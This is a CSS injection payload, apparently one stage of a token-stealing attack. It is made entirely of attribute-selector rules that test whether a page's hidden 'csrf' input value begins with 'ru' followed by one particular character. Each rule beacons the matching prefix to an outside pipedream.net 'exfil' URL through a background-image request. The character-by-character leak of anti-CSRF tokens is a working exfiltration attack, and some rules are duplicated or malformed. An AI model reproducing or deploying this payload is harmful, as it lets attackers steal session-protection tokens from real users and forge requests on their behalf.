input[name=csrf][value^="rua"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rua); }
input[name=csrf][value^="ruz"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruz); }
input[name=csrf][value^="rue"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rue); }
input[name=csrf][value^="rur"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rur); }
input[name=csrf][value^="rut"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rut); }
input[name=csrf][value^="ruy"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruy); }
input[name=csrf][value^="ruu"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruu); }
input[name=csrf][value^="rui"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rui); }
input[name=csrf][value^="ruo"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruo); }
input[name=csrf][value^="rup"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rup); }
input[name=csrf][value^="ruq"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruq); }
input[name=csrf][value^="rus"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rus); }
input[name=csrf][value^="rud"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rud); }
input[name=csrf][value^="ruf"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruf); }
input[name=csrf][value^="rug"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rug); }
input[name=csrf][value^="ruh"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruh); }
input[name=csrf][value^="ruj"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruj); }
input[name=csrf][value^="ruk"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruk); }
input[name=csrf][value^="rul"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rul); }
input[name=csrf][value^="rum"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rum); }
input[name=csrf][value^="ruw"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruw); }
input[name=csrf][value^="rux"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rux); }
input[name=csrf][value^="ruc"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruc); }
input[name=csrf][value^="ruv"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruv); }
input[name=csrf][value^="rub"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rub); }
input[name=csrf][value^="run"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/run); }
input[name=csrf][value^="ruA"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruA); }
input[name=csrf][value^="ruZ"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruZ); }
input[name=csrf][value^="ruE"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruE); }
input[name=csrf][value^="ruR"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruR); }
input[name=csrf][value^="ruT"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruT); }
input[name=csrf][value^="ruY"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruY); }
input[name=csrf][value^="ruU"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruU); }
input[name=csrf][value^="ruI"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruI); }
input[name=csrf][value^="ruO"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruO); }
input[name=csrf][value^="ruP"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruP); }
input[name=csrf][value^="ruQ"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruQ); }
input[name=csrf][value^="ruS"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruS); }
input[name=csrf][value^="ruD"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruD); }
input[name=csrf][value^="ruF"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruF); }
input[name=csrf][value^="ruG"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruG); }
input[name=csrf][value^="ruH"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruH); }
input[name=csrf][value^="ruJ"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruJ); }
input[name=csrf][value^="ruK"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruK); }
input[name=csrf][value^="ruL"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruL); }
input[name=csrf][value^="ruM"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruM); }
input[name=csrf][value^="ruW"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW); }
input[name=csrf][value^="ruX"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruX); }
input[name=csrf][value^="ruC"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruC); }
input[name=csrf][value^="ruV"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruV); }
input[name=csrf][value^="ruB"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruB); }
input[name=csrf][value^="ruN"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruN); }
input[name=csrf][value^="ru0"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru0); }
input[name=csrf][value^="ru1"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru1); }
input[name=csrf][value^="ru2"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru2); }
input[name=csrf][value^="ru3"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru3); }
input[name=csrf][value^="ru4"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru4); }
input[name=csrf][value^="ru5"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru5); }
input[name=csrf][value^="ru6"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru6); }
input[name=csrf][value^="ru7"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru7); }
input[name=csrf][value^="ru8"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru8); }
input[name=csrf][value^="ru9"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru9); }
input[name=csrf][value^="ru_"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru_); }
input[name=csrf][value^="ru-"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru-); }
input[name=csrf][value^="rué"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rué); }
input[name=csrf][value^="ruà"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruà); }
input[name=csrf][value^="ruè"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruè); }
input[name=csrf][value^="ruù"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruù); }
input[name=csrf][value^="ruç"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruç); }
input[name=csrf][value^="ru€"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru€); }
input[name=csrf][value^="ru£"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru£); }
input[name=csrf][value^="ru?"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru?); }
input[name=csrf][value^="ru,"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru,); }
input[name=csrf][value^="ru;"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru;); }
input[name=csrf][value^="ru:"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru:); }
input[name=csrf][value^="ru!"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru!); }
input[name=csrf][value^="ru?"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru?); }
input[name=csrf][value^="ru."]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru.); }
input[name=csrf][value^="ru/"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru/); }
input[name=csrf][value^="ru§"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru§); }
input[name=csrf][value^="ru$"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru$); }
input[name=csrf][value^="rué"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/rué); }
input[name=csrf][value^="ruè"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruè); }
input[name=csrf][value^="ru&"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru&); }
input[name=csrf][value^="ru="]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru=); }
input[name=csrf][value^="ru+"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru+); }
input[name=csrf][value^="ru<"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru<); }
input[name=csrf][value^="ru>"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru>); }
input[name=csrf][value^="ru~"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru~); }
input[name=csrf][value^="ru#"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru#); }
input[name=csrf][value^="ru*"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru*); }
input[name=csrf][value^="ru%"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru%); }
input[name=csrf][value^="ru""]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru"); }
input[name=csrf][value^="ru'"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru'); }
input[name=csrf][value^="ru{"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru{); }
input[name=csrf][value^="ru}"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru}); }
input[name=csrf][value^="ru("]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru(); }
input[name=csrf][value^="ru)"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru)); }
input[name=csrf][value^="ru["]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru[); }
input[name=csrf][value^="ru]"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru]); }
input[name=csrf][value^="ru|"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru|); }
input[name=csrf][value^="ru\"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru\); }
input[name=csrf][value^="ru/"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru/); }
input[name=csrf][value^="ru^"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru^); }
input[name=csrf][value^="ru@"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ru@); }
